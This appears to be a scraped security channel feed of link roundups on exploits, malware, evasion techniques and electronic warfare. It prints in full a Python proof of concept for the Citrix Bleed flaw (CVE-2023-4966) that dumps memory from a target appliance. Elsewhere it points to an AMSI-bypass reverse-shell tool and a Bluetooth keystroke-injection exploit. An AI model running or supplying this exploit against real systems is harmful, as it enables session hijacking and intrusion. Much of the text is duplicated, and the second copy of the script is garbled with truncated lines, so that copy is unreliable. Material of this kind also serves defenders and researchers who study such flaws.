Whatsapp Spoofing impersonate of reply message
All official WhatsApp clients, upon receiving a "Message Reply" payload (QuotedMessage), do not validate whether the "ContextInfo" of this "QuotedMessage" is valid/exists ("StanzaId" and "Participant"). This allows a malicious actor to send in private chats or groups a "QuotedMessage" of a message that never existed on behalf of another person. This is highly critical and dangerous.
https://github.com/lichti/whats-spoofing
PoC: https://youtu.be/_WL6hpAvNh8
All official WhatsApp clients, upon receiving a "Message Reply" payload (QuotedMessage), do not validate whether the "ContextInfo" of this "QuotedMessage" is valid/exists ("StanzaId" and "Participant"). This allows a malicious actor to send in private chats or groups a "QuotedMessage" of a message that never existed on behalf of another person. This is highly critical and dangerous.
https://github.com/lichti/whats-spoofing
PoC: https://youtu.be/_WL6hpAvNh8
Bad Zip and new Packer for Android/BianLian.
https://cryptax.medium.com/bad-zip-and-new-packer-for-android-bianlian-5bdad4b90aeb
https://cryptax.medium.com/bad-zip-and-new-packer-for-android-bianlian-5bdad4b90aeb
Medium
Bad Zip and new Packer for Android/BianLian
I got my hands on a new sample of Android/BianLian (sha256: 0070bc10699a982a26f6da48452b8f5e648e1e356a7c1667f393c5c3a1150865), a banking…
Inside The ‘Magic Radio’ Protecting Russian Drones From Jamming.
https://t.me/StavBPLA/195
https://www.forbes.com/sites/davidhambling/2023/12/20/inside-the-magic-radio-protecting-russian-drones-from-jamming/
https://t.me/StavBPLA/195
https://www.forbes.com/sites/davidhambling/2023/12/20/inside-the-magic-radio-protecting-russian-drones-from-jamming/
Telegram
Школа БПЛА Ставрополь
**Соскучились по техничке**⁉️
Сегодня познакомим вас с комплектом помехозащищенной связи «Гермес»
Фото 1-приёмник
Фото 2-передатчик
Фото 3-ретранслятор
Что я могу сказать резюмируя:они хороши вот прям хороши.
1)**Широкий диапазон частот** В котором можно…
Сегодня познакомим вас с комплектом помехозащищенной связи «Гермес»
Фото 1-приёмник
Фото 2-передатчик
Фото 3-ретранслятор
Что я могу сказать резюмируя:они хороши вот прям хороши.
1)**Широкий диапазон частот** В котором можно…
Exploring Hell's Gate.
Hell's Gate makes it possible to execute direct syscalls based on dynamically retrieving the required SSNs via a combination of walking the Process Environment Block (PEB), parsing the Export Address Table (EAT) from ntdll.dll, opcode comparison from the syscall stub of the native functions and extracting the SSNs.
https://redops.at/en/blog/exploring-hells-gate
Hell's Gate makes it possible to execute direct syscalls based on dynamically retrieving the required SSNs via a combination of walking the Process Environment Block (PEB), parsing the Export Address Table (EAT) from ntdll.dll, opcode comparison from the syscall stub of the native functions and extracting the SSNs.
https://redops.at/en/blog/exploring-hells-gate
RedOps - English
Exploring Hell's Gate - RedOps
OPSWAT
Advanced Network Detection & Response - MetaDefender NDR - OPSWAT
Our Network Detection and Response is purpose-built to help your SOC team operate at peak efficiency. Talk to an expert about MetaDefender NDR today.
■■■□□ An Introduction to Deep File Inspection® (DFI).
https://inquest.net/blog/an-introduction-to-deep-file-inspection/
https://inquest.net/blog/an-introduction-to-deep-file-inspection/
WMIProcessWatcher: A CIA tradecraft technique to asynchronously detect when a process is created using WMI.
https://github.com/hackerhouse-opensource/WMIProcessWatcher
https://github.com/hackerhouse-opensource/WMIProcessWatcher
GitHub
GitHub - hackerhouse-opensource/WMIProcessWatcher: A CIA tradecraft technique to asynchronously detect when a process is created…
A CIA tradecraft technique to asynchronously detect when a process is created using WMI. - hackerhouse-opensource/WMIProcessWatcher
Building an Exploit for FortiGate Vulnerability CVE-2023-27997.
https://bishopfox.com/blog/building-exploit-fortigate-vulnerability-cve-2023-27997
https://bishopfox.com/blog/building-exploit-fortigate-vulnerability-cve-2023-27997
Bishop Fox
Building an Exploit for FortiGate Vulnerability CVE-2023-27997
Learn how Bishop Fox built a POC exploit for the pre-authentication remote code injection vulnerability in the Fortinet SSL VPN published by Lexfo.
Citrix Bleed Zero-Day CVE-2023-4966 by AssetNote team.
#!/usr/bin/env python3
import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200 )')
args = parser.parse_args()
if args.target is None:
print('Target must be provided (e.g. --target 192.168.1.200 )')
sys.exit(0)
hostname = args.target
if name == "main":
headers = {
"Host": "a"*24576
}
r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
if r.status_code == 200:
print("--- Dumped Memory ---")
print(r.text[131050:])
print("--- End ---")
else:
print("Could not dump memory")
import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g.
args = parser.parse_args()
if
print('Target must be provided (e.g. --target
sys.exit(0)
hostname =
if name == "main":
headers = {
"Host": "a"*24576
}
r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
if r.status_code == 200:
print("--- Dumped Memory ---")
print(r.text[131050:])
print("--- End ---")
else:
print("Could not dump memory")
Zero-Day: CVE-2023-45866 and CVE-2024-21306 exploitation.
Exploiting 0-click Android Bluetooth vulnerability to inject keystrokes without pairing.
https://www.mobile-hacker.com/2024/01/23/exploiting-0-click-android-bluetooth-vulnerability-to-inject-keystrokes-without-pairing/
https://youtu.be/dj1lGqL8lXo
Exploiting 0-click Android Bluetooth vulnerability to inject keystrokes without pairing.
https://www.mobile-hacker.com/2024/01/23/exploiting-0-click-android-bluetooth-vulnerability-to-inject-keystrokes-without-pairing/
https://youtu.be/dj1lGqL8lXo
Mobile Hacker
Exploiting 0-click Android Bluetooth vulnerability to inject keystrokes without pairing Mobile Hacker
[update 2024-02-19] This vulnerability can be even used to remotely wipe data of targeted Android smartphone. Using this vulnerability it is possible to guess user lock screen PIN. After five incorrect PINs device is locked out for 30 seconds. This operation…
Bypassing Wi-Fi Encryption by Manipulating Transmit Queues.
https://www.usenix.org/system/files/usenixsecurity23-schepers.pdf
https://www.usenix.org/system/files/usenixsecurity23-schepers.pdf
China has said in a technological breakthrough; entire electromagnetic spectrum can be analyzed and disabled by the jamming technology.
China Claims Starlink Satellites Now Easy Prey Thanks To ‘Tech Breakthrough’ In Electronic Warfare.
https://www.eurasiantimes.com/china-claims-breakthrough-in-electronic-warfare/amp/
China Claims Starlink Satellites Now Easy Prey Thanks To ‘Tech Breakthrough’ In Electronic Warfare.
https://www.eurasiantimes.com/china-claims-breakthrough-in-electronic-warfare/amp/
EURASIAN TIMES
China Claims Starlink Satellites Now Easy Prey Thanks To 'Tech Breakthrough' In Electronic Warfare
In yet another instance of extraordinary claims emerging from Beijing regarding electronic warfare capabilities, Chinese researchers, for the first time, purportedly have developed seamless, wide-bandwidth, real-time monitoring and analysis of the electromagnetic…
Zero-Day (via CVE-2023-45866): Exploiting Zero-click Android Bluetooth vulnerability to inject keystrokes without pairing.
https://www.mobile-hacker.com/2024/01/23/exploiting-0-click-android-bluetooth-vulnerability-to-inject-keystrokes-without-pairing/
https://www.mobile-hacker.com/2024/01/23/exploiting-0-click-android-bluetooth-vulnerability-to-inject-keystrokes-without-pairing/
Mobile Hacker
Exploiting 0-click Android Bluetooth vulnerability to inject keystrokes without pairing Mobile Hacker
[update 2024-02-19] This vulnerability can be even used to remotely wipe data of targeted Android smartphone. Using this vulnerability it is possible to guess user lock screen PIN. After five incorrect PINs device is locked out for 30 seconds. This operation…
Reverse engineering FOSCAM encryption keys from extracted firmware using Ghidra.
https://hacked.codes/2023/extracting-firmware-reverse-engineering-encryption-keys-foscam/
https://hacked.codes/2023/extracting-firmware-reverse-engineering-encryption-keys-foscam/
hacked.codes
Reverse engineering FOSCAM encryption keys from extracted firmware using Ghidra | hacked.codes
FOSCAM firmware is encrypted with openssl using a salted key. This post will demonstrate how to extract the firmware using an $14 SPI flash programmer, and reverse engineer the decryption keys for the firmware, and RSA keys that ship with the firmware using…
A tool that allegedly bypasses AMSI (AntiMalware Scan Interface) and PowerShell CLM (Constrained Language Mode) and gives you a FullLanguage PowerShell reverse shell.
https://github.com/Sh3lldon/FullBypass
https://github.com/Sh3lldon/FullBypass
GitHub
GitHub - Sh3lldon/FullBypass: A tool which bypasses AMSI (AntiMalware Scan Interface) and PowerShell CLM (Constrained Language…
A tool which bypasses AMSI (AntiMalware Scan Interface) and PowerShell CLM (Constrained Language Mode) and gives you a FullLanguage PowerShell reverse shell. - Sh3lldon/FullBypass
BurpSuite's chromium browser adds a header as it sends the request across to the server.
Sec-Ua*
● I found it when one website blocked my requests for a normal login (with a 302 redirect to WAF's soft error). This is over a half year old story. Thought of sharing.
● I found it when one website blocked my requests for a normal login (with a 302 redirect to WAF's soft error). This is over a half year old story. Thought of sharing.
HTTP Downgrade attacks with SmuggleFuzz.
https://moopinger.github.io/blog/smugglefuzz/fuzzing/smuggling/2024/01/31/SmuggleFuzz.html
https://moopinger.github.io/blog/smugglefuzz/fuzzing/smuggling/2024/01/31/SmuggleFuzz.html
MOOPINGER
HTTP Downgrade attacks with SmuggleFuzz
Place to store my thoughts on all things information-security related. Hopefully you find something of interest. Ramblings are my own. Charlton Smith